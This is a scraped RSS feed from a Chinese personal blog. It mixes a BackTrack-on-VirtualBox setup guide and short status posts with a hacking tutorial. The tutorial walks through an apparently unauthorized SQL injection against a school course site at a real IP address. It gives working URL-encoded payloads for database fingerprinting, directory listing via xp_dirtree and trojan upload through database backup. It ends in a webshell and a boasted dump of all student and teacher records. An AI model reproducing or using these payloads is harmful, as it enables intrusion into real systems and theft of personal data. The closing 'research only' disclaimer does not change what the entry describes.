http://www.xuyunfeng.com.cn/ zh-cn PBlog2 v2.4 http://www.xuyunfeng.com.cn/images/logos.gif http://www.xuyunfeng.com.cn/ 许云风's BLOG http://www.xuyunfeng.com.cn/article.asp?id=209 xuyunfeng@xuyunfeng.com.cn(许云风) Wed,29 Jun 2011 19:31:08 +0800 http://www.xuyunfeng.com.cn/default.asp?id=209

 

]]> http://www.xuyunfeng.com.cn/article.asp?id=206 xuyunfeng@xuyunfeng.com.cn(许云风) Sun,24 Apr 2011 01:49:23 +0800 http://www.xuyunfeng.com.cn/default.asp?id=206

]]> http://www.xuyunfeng.com.cn/article.asp?id=205 xuyunfeng@xuyunfeng.com.cn(许云风) Tue,25 Jan 2011 12:21:20 +0800 http://www.xuyunfeng.com.cn/default.asp?id=205 一.主机:ubunt系统
二:虚拟机backtrack
安装过程不用多说:
1:联网

默认联网方式为NAT,backtrack默认情况下没启动eth0,开机启动:ifup eth0
桥接方式上网:先设置virtualbox为桥接方式

进入BACKTRACK，编辑 vi /etc/network/interfaces根据实际情况填写

设置DNS vi /etc/resolv.conf
重启网络即可上网
/etc/init.d/networking restart
2. 安装virtualbox增强工具
关闭backtrack
在virtualbox中添加光驱并加载增强工具:VBoxGuestAdditions.iso
路径为:/usr/share/virtualbox/VBoxGuestAdditions.iso

启动backtrack
挂加光驱
在运行Ubuntu的virtualbox菜单里选择“设备”-“安装增强功能”
mkdir /mnt/cdrom
mount /dev/cdrom3 /mnt/cdrom
挂载成功
cd /mnt/cdrom
./VBoxLinuxAdditions.run

安装成功.重启即可
3：设置共享空间
关闭backtrack
在virtualbox中不能直接访问宿主机的数据,需要设置共享空间
设置需要共享的数据

我需要共享的位置为:/home/xuyunfeng
数据空间的名字为:xuyunfeng
注意不要选择“只读”
启动backtrack
dir /sbin/mount.*，确认/sbin/mount.vboxsf存在
.lsmod | grep vboxvfs，查看boxvfs模块是否加载
mount -t vboxsf 数据空间的名字 在BACKTRACK中的建立的共享文件目录
数据空间的名字:xuyunfeng
运行mkdir /root/share
在BACKTRACK中的建立的共享文件目录：/root/share

共享空间安装成功,但是重启后又需要再次加载

设置自动加载
在/etc/fstab中最后添加一行
xuyunfeng   /root/share    vboxsf    rw    0    0

保存重启即可。


]]> http://www.xuyunfeng.com.cn/article.asp?id=204 xuyunfeng@xuyunfeng.com.cn(许云风) Sat,15 Jan 2011 03:10:32 +0800 http://www.xuyunfeng.com.cn/default.asp?id=204 http://www.xuyunfeng.com.cn/article.asp?id=203 xuyunfeng@xuyunfeng.com.cn(许云风) Sun,15 Jun 2008 16:19:32 +0800 http://www.xuyunfeng.com.cn/default.asp?id=203    对不起朋友们,最近因为工作原因不能更新博客,有的朋友说软件不能下载,
可以在网上搜索一下嘛!
       可能明年才有时间来管理博客了! ]]> http://www.xuyunfeng.com.cn/article.asp?id=202 xuyunfeng@xuyunfeng.com.cn(许云风) Sun,04 May 2008 16:51:21 +0800 http://www.xuyunfeng.com.cn/default.asp?id=202 下次改软件的时候,一定改进!!

]]> http://www.xuyunfeng.com.cn/article.asp?id=201 xuyunfeng@xuyunfeng.com.cn(许云风) Fri,25 Apr 2008 06:01:15 +0800 http://www.xuyunfeng.com.cn/default.asp?id=201

http://dx.3800hk.com/vipdown/vipdown/v09/200804/22706.html]]> http://www.xuyunfeng.com.cn/article.asp?id=199 xuyunfeng@xuyunfeng.com.cn(许云风) Mon,21 Apr 2008 00:42:11 +0800 http://www.xuyunfeng.com.cn/default.asp?id=199

]]> http://www.xuyunfeng.com.cn/article.asp?id=198 xuyunfeng@xuyunfeng.com.cn(许云风) Fri,18 Apr 2008 23:07:48 +0800 http://www.xuyunfeng.com.cn/default.asp?id=198 没什么技术含量,别见笑!呵呵,开始了,1.先判断是否存在注入:在地址后面打上'
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'

有防注入系统,限制了我的IP,现在就可以用COOKIES注入器
进入注入:


填写相应信息,生成1.asp,放到我服务器上次,地址是:http://www.xuyunfeng.com.cn/1.asp
加上参数为:http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048
现在尝试注入;http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048'

提示出错,试了一下不能注入,到了这里一般的朋友都放弃了,现在我们回到原来的注入点
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048一:暴数据库信息:
1.判断数据库名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20and%20db_name()>0%20and%20''='

暴出数据库名为:wlxt
2.判断数据库用户名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20and%20user>0%20and%20''='

数据库名为:wlxt136
3.判断数据库权限:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1%20and%20''='

暴出用户权限是:DB的,DB权限可以列目录，现在我们来列网站目录
二:列网站目录
1.创建表:xuyunfeng列C盘的文件和目录
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048';Drop%20TABLE%20xuyufeng;Create%20TABLE%20xuyunfeng(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20xuyunfeng%20exec%20master..xp_dirtree%20"C:\",%201,1--

提示防注入系统,不用管它,创建表成功
2:暴出C盘的文件和目录个数
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20xuyunfeng)=0%20%20and%20''='

暴出一共有13个目录和文件
3.列出第一个文件和目录(目录前面有0)
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%201%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

第一个目录为:ASFRoot
4:列出第二个文件或目录:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%202%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

第二个目录名为:Config.Msi
5.列第三个文件或目录名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%203%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

第三个目录为:Documents and Settings
依次这样列出C盘的所有目录和文件,依次可以列所网站的所有目录和文件,从而找到网站
我已经找到了:d:\webroot\wlxt\现在拿到数据库的信息和网站目录,现在可以通过数据库备份
写上一句话木马:
三:上传木马:
1.用到工具,DB备份工具

把得到的信息写到软件里,依次点击备份,不要管提示,我们看是否成功!

备份成功了，现在用一个免杀大马


点"给我冲进去"看是否成功!
http://218.6.168.52/wlxt/help.asp

成功了,输入密码进入!

我们成功拿到webshell,结束了这次检测!

我用工具拿到了整个数据库:包括所有学生和所有老师的信息,上面是所有老师的信息,但我们不能触犯法律,只是起技术的研究,有些并不是完全相同,好就到这了!
]]> http://www.xuyunfeng.com.cn/article.asp?id=196 xuyunfeng@xuyunfeng.com.cn(许云风) Sun,13 Apr 2008 10:05:12 +0800 http://www.xuyunfeng.com.cn/default.asp?id=196

]]>